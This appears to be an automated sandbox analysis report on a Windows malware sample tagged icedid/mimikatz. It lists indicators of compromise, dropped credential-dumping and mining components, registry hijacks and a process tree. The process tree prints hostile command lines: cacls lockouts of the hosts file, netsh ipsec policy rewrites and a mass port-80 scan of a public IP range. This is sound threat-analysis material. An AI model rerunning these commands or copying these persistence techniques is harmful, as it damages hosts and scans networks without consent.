Analysis
max time kernel: 146s
max time network: 153s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 18/01/2024, 23:07
Behavioral task: behavioral1
Sample: 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
Resource: win7-20231215-en
General
Target: 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
Size: 8.1MB
MD5: 994a1dda85a2606649ad14a8a5ca2a83
SHA1: c4ffa4a4a6b9d7571be748bf524701f7a0e87d7e
SHA256: 2334e09bbdba3a24db9c4e469e211b97cc35873f8e379e81073da11214838194
SHA512: e54ce8d9e7ee2437f2d7b2a21b590d44437deaf31db5ef637deb9e5041ed2d772d37fe29c0cdde60114448f8e4439a68763f6a128f59479a814507bca3c6e9df
SSDEEP: 196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 2788 created 916 | 2788 | bubpucp.exe | 20
Contacts a large (22071) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
resource | yara_rule
behavioral1/memory/996-135-0x000000013FE40000-0x000000013FF2E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
behavioral1/memory/996-136-0x000000013FE40000-0x000000013FF2E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
UPX dump on OEP (original entry point) 43 IoCs
XMRig Miner payload 13 IoCs
mimikatz is an open source tool to dump credentials on Windows 12 IoCs
Drops file in Drivers directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | bubpucp.exe
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | bubpucp.exe
Modifies Windows Firewall 1 TTPs 2 IoCs
pid | Process
2640 | netsh.exe
2856 | netsh.exe
Sets file execution options in registry 2 TTPs 40 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bubpucp.exe
Executes dropped EXE 16 IoCs
pid | Process
2700 | bubpucp.exe
2788 | bubpucp.exe
2488 | wpcap.exe
1408 | znjiklplb.exe
996 | vfshost.exe
536 | xohudmc.exe
992 | rifzsk.exe
1816 | lunglbpll.exe
448 | bpgzsl.exe
896 | lunglbpll.exe
628 | lunglbpll.exe
1644 | lunglbpll.exe
2656 | lunglbpll.exe
320 | bubpucp.exe
2980 | tnplbywcb.exe
3704 | bubpucp.exe
Loads dropped DLL 22 IoCs
pid | Process
2976 | cmd.exe
2976 | cmd.exe
2396 | cmd.exe
2488 | wpcap.exe
2488 | wpcap.exe
2488 | wpcap.exe
2488 | wpcap.exe
2488 | wpcap.exe
588 | cmd.exe
1408 | znjiklplb.exe
1408 | znjiklplb.exe
1980 | cmd.exe
1980 | cmd.exe
2788 | bubpucp.exe
2788 | bubpucp.exe
2788 | bubpucp.exe
2788 | bubpucp.exe
2788 | bubpucp.exe
2788 | bubpucp.exe
2788 | bubpucp.exe
2788 | bubpucp.exe
1884 | cmd.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
19 | ifconfig.me
20 | ifconfig.me
Creates a Windows Service
Drops file in System32 directory 18 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 | bubpucp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BC5F9EEA6885ADA7AD24639E57D2FCB1 | bubpucp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BC5F9EEA6885ADA7AD24639E57D2FCB1 | bubpucp.exe
File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A | bubpucp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 | bubpucp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A | bubpucp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | bubpucp.exe
File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
File created | C:\Windows\system32\wpcap.dll | wpcap.exe
File created | C:\Windows\SysWOW64\rifzsk.exe | xohudmc.exe
File created | C:\Windows\system32\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\rifzsk.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 | bubpucp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | bubpucp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 | bubpucp.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | bubpucp.exe
Drops file in Program Files directory 3 IoCs
description | ioc | Process
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
Drops file in Windows directory 60 IoCs
description | ioc | Process
File created | C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\spoolsrv.xml | bubpucp.exe
File created | C:\Windows\ime\bubpucp.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\schoedcl.xml | bubpucp.exe
File opened for modification | C:\Windows\jgebjtcb\vimpcsvc.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\trch-1.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\trfo-2.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\Corporate\mimidrv.sys | bubpucp.exe
File created | C:\Windows\lsyqbeqew\ylzbebeqp\ip.txt | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\schoedcl.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\AppCapture64.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\cnli-1.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\schoedcl.exe | bubpucp.exe
File opened for modification | C:\Windows\jgebjtcb\docmicfg.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\spoolsrv.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\docmicfg.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\exma-1.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\svschost.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\AppCapture32.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\ylzbebeqp\scan.bat | bubpucp.exe
File created | C:\Windows\jgebjtcb\bubpucp.exe | 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
File opened for modification | C:\Windows\lsyqbeqew\ylzbebeqp\Packet.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\crli-0.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\tibe-2.dll | bubpucp.exe
File created | C:\Windows\jgebjtcb\spoolsrv.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\libeay32.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\spoolsrv.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\vimpcsvc.xml | bubpucp.exe
File created | C:\Windows\jgebjtcb\vimpcsvc.xml | bubpucp.exe
File opened for modification | C:\Windows\jgebjtcb\spoolsrv.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\Shellcode.ini | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\tucl-1.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\docmicfg.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\vimpcsvc.xml | bubpucp.exe
File opened for modification | C:\Windows\lsyqbeqew\ylzbebeqp\Result.txt | tnplbywcb.exe
File created | C:\Windows\lsyqbeqew\ylzbebeqp\Packet.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\Corporate\vfshost.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\Corporate\mimilib.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\posh-0.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\vimpcsvc.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\svschost.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\docmicfg.xml | bubpucp.exe
File opened for modification | C:\Windows\jgebjtcb\schoedcl.xml | bubpucp.exe
File opened for modification | C:\Windows\jgebjtcb\bubpucp.exe | 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
File created | C:\Windows\lsyqbeqew\ylzbebeqp\tnplbywcb.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\ssleay32.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\zlib1.dll | bubpucp.exe
File created | C:\Windows\jgebjtcb\svschost.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\xdvl-0.dll | bubpucp.exe
File created | C:\Windows\jgebjtcb\schoedcl.xml | bubpucp.exe
File opened for modification | C:\Windows\jgebjtcb\svschost.xml | bubpucp.exe
File created | C:\Windows\lsyqbeqew\upbdrjv\swrpwe.exe | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\coli-0.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\libxml2.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\ucl.dll | bubpucp.exe
File created | C:\Windows\lsyqbeqew\UnattendGC\specials\svschost.xml | bubpucp.exe
File created | C:\Windows\jgebjtcb\docmicfg.xml | bubpucp.exe
File opened for modification | C:\Windows\lsyqbeqew\Corporate\log.txt | cmd.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1004 | sc.exe
592 | sc.exe
1992 | sc.exe
1244 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
NSIS installer 14 IoCs
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1052 | schtasks.exe
2136 | schtasks.exe
1624 | schtasks.exe
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 14 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | bubpucp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | bubpucp.exe
description | ioc | Process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob omitted] | bubpucp.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob omitted] | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | bubpucp.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted] | bubpucp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | bubpucp.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [hex certificate blob omitted; the UTF-16 subject string embedded in it reads "DST Root CA X3"] | bubpucp.exe
Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs
pid | Process
2644 | PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid | Process
320 | bubpucp.exe
3704 | bubpucp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2788 | bubpucp.exe (64 identical entries)

Suspicious behavior: LoadsDriver 31 IoCs
pid | Process
484 | Process not Found (31 identical entries)

Suspicious behavior: RenamesItself 1 IoCs
pid | Process
2080 | 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2080 | 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | 2700 | bubpucp.exe
Token: SeDebugPrivilege | 2788 | bubpucp.exe
Token: SeDebugPrivilege | 996 | vfshost.exe
Token: SeAuditPrivilege | 2676 | svchost.exe
Token: SeDebugPrivilege | 1816 | lunglbpll.exe
Token: SeShutdownPrivilege | 1816 | lunglbpll.exe
Token: SeLockMemoryPrivilege | 448 | bpgzsl.exe
Token: SeLockMemoryPrivilege | 448 | bpgzsl.exe
Token: SeDebugPrivilege | 896 | lunglbpll.exe
Token: SeShutdownPrivilege | 896 | lunglbpll.exe
Token: SeDebugPrivilege | 628 | lunglbpll.exe
Token: SeShutdownPrivilege | 628 | lunglbpll.exe
Token: SeDebugPrivilege | 1644 | lunglbpll.exe
Token: SeShutdownPrivilege | 1644 | lunglbpll.exe
Token: SeDebugPrivilege | 2656 | lunglbpll.exe
Token: SeShutdownPrivilege | 2656 | lunglbpll.exe

Suspicious use of SetWindowsHookEx 12 IoCs
pid | Process
2080 | 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
2080 | 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe
2700 | bubpucp.exe
2700 | bubpucp.exe
2788 | bubpucp.exe
2788 | bubpucp.exe
536 | xohudmc.exe
992 | rifzsk.exe
320 | bubpucp.exe
320 | bubpucp.exe
3704 | bubpucp.exe
3704 | bubpucp.exe

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2080 wrote to memory of 2976 | 2080 | 2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe | 28 (4 identical entries)
PID 2976 wrote to memory of 2644 | 2976 | cmd.exe | 29 (4 identical entries)
PID 2976 wrote to memory of 2700 | 2976 | cmd.exe | 40 (4 identical entries)
PID 2788 wrote to memory of 2244 | 2788 | bubpucp.exe | 38 (4 identical entries)
PID 2244 wrote to memory of 2808 | 2244 | cmd.exe | 36 (4 identical entries)
PID 2244 wrote to memory of 2652 | 2244 | cmd.exe | 87 (4 identical entries)
PID 2244 wrote to memory of 2764 | 2244 | cmd.exe | 32 (4 identical entries)
PID 2244 wrote to memory of 2688 | 2244 | cmd.exe | 35 (4 identical entries)
PID 2244 wrote to memory of 2664 | 2244 | cmd.exe | 34 (4 identical entries)
PID 2244 wrote to memory of 2600 | 2244 | cmd.exe | 33 (4 identical entries)
PID 2788 wrote to memory of 320 | 2788 | bubpucp.exe | 168 (4 identical entries)
PID 2788 wrote to memory of 548 | 2788 | bubpucp.exe | 44 (4 identical entries)
PID 2788 wrote to memory of 2880 | 2788 | bubpucp.exe | 46 (4 identical entries)
PID 2788 wrote to memory of 2396 | 2788 | bubpucp.exe | 65 (4 identical entries)
PID 2396 wrote to memory of 2488 | 2396 | cmd.exe | 63 (7 identical entries)
PID 2488 wrote to memory of 1560 | 2488 | wpcap.exe | 117
Processes
C:\Windows\System32\spoolsv.exe (PID 916): C:\Windows\System32\spoolsv.exe
    C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe (PID 448): "C:\Windows\TEMP\pcpntrnlq\bpgzsl.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\AppData\Local\Temp\2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe (PID 2080): "C:\Users\Admin\AppData\Local\Temp\2024-01-18_994a1dda85a2606649ad14a8a5ca2a83_hacktools_icedid_mimikatz.exe"
    - Drops file in Windows directory
    - Suspicious behavior: RenamesItself
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 2976): cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jgebjtcb\bubpucp.exe
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\PING.EXE (PID 2644): ping 127.0.0.1 -n 5
            - Runs ping.exe
        C:\Windows\jgebjtcb\bubpucp.exe (PID 2700): C:\Windows\jgebjtcb\bubpucp.exe
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
C:\Windows\SysWOW64\cacls.exe (PID 2652): cacls C:\Windows\system32\drivers\etc\hosts /T /D users
C:\Windows\SysWOW64\cmd.exe (PID 2764): C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe (PID 2600): cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
C:\Windows\SysWOW64\cmd.exe (PID 2664): C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe (PID 2688): cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
C:\Windows\SysWOW64\cmd.exe (PID 2808): C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cmd.exe (PID 2244): cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    - Suspicious use of WriteProcessMemory
C:\Windows\jgebjtcb\bubpucp.exe (PID 2788): C:\Windows\jgebjtcb\bubpucp.exe
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in Drivers directory
    - Sets file execution options in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\netsh.exe (PID 320): netsh ipsec static del all
    C:\Windows\SysWOW64\netsh.exe (PID 548): netsh ipsec static add policy name=Bastards description=FuckingBastards
    C:\Windows\SysWOW64\netsh.exe (PID 2880): netsh ipsec static add filteraction name=BastardsList action=block
    C:\Windows\SysWOW64\cmd.exe (PID 1244): cmd /c net start npf
    C:\Windows\SysWOW64\cmd.exe (PID 2396): cmd /c C:\Windows\lsyqbeqew\ylzbebeqp\wpcap.exe /S
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 588): cmd /c C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lsyqbeqew\ylzbebeqp\Scant.txt
        - Loads dropped DLL
        C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe (PID 1408): C:\Windows\lsyqbeqew\ylzbebeqp\znjiklplb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\lsyqbeqew\ylzbebeqp\Scant.txt
            - Executes dropped EXE
            - Loads dropped DLL
